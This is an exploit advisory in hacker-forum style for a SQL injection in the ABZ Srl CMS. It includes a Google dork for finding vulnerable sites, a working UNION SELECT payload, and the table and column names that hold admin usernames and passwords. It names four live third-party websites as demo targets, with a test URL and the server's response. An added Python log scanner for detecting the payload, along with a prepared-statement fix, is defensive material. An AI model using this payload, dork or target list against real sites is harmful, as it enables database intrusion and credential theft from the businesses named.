[+] Exploit Title: (ABZ Srl) Cms SQL Injection
[+] Exploit Author: Medrik
[+] Found Date: 13-03-2014
[+] Vendor Homepage: http://www.abzsrl.com/
[+] Google Dork: intext:"powered by ABZ Srl" inurl:pagine.php?id=
[+] Tested on: Windows
==========================================
[+] Exploit (Vulnerability Location):
http://[vulnerable_host]/pagine.php?id=IdNumber[SQLi]
This SQL injection can be exercised with sqlmap or similar tools.
[*] Important Table : AMMINISTRAZIONE
[*] Important Columns : For User : [ USERN ] & For Password : [ PSWD ]
[*] Example PoC For Database Version : +/*!union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
[*] Test : http://www.reginanewhouse.com/pagine.php?id=2+/*!union*/+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
[*] Response For Test : 5.5.36-34.2-log
[*] Admin Page : /admin
[*] Image : http://i.imgur.com/wNAWyBI.png
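[*] Detection (added example, not part of the original advisory and not ABZ Srl code): a log check that flags pagine.php requests whose id parameter is not a plain integer, unwrapping the /*!...*/ MySQL comment used in the PoC before keyword matching. The combined-log-format input, the sample lines (constructed) and the names classify_id and scan are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [13/Mar/2014:10:00:01 +0000] "GET /pagine.php?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Mar/2014:10:00:05 +0000] "GET /pagine.php?id=2+/*!union*/+select+1,version%28%29,3 HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Mar/2014:10:00:09 +0000] "GET /pagine.php?id=7%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
192.0.2.44 - - [13/Mar/2014:10:01:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
MYSQL_EXEC_COMMENT_RE = re.compile(r"/\*!\d*(.*?)\*/", re.S)
SQL_KEYWORD_RE = re.compile(r"\b(union|select|from|information_schema|version\s*\()", re.I)


def classify_id(value):
    """Return None for a plain integer id, otherwise a reason string."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    # MySQL executes the body of /*! ... */ comments, so unwrap them before matching.
    unwrapped = MYSQL_EXEC_COMMENT_RE.sub(r" \1 ", value)
    if SQL_KEYWORD_RE.search(unwrapped):
        return "sql-keywords"
    return "non-integer"


def scan(log_text, script="/pagine.php", param="id"):
    """Return (client_ip, reason, decoded_value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(script):
            continue
        # parse_qs URL-decodes the value, so %28 and '+' are normalised first.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify_id(value)
            if reason:
                findings.append((client, reason, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Detection does not replace the fix: the id value should be cast to an integer or bound in a prepared statement before it reaches the query.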
==========================================
[+] Demo (s) :
(#) http://www.reginanewhouse.com/pagine.php?id=2[SQli]
(#) http://www.gruppo-ria.com/pagine.php?id=2[SQli]
(#) http://www.euroxoro-torino.it/pagine.php?id=7[SQli]
(#) http://www.dimsegnaletica.com/pagine.php?id=4[SQli]
==========================================
[+] Gr33tz :
R33VES , Enddo , Beni_Vanda , Explo!ter , Black.KinG , M.R.S.CO , MR.0x41 , Dr.3v1l
==========================================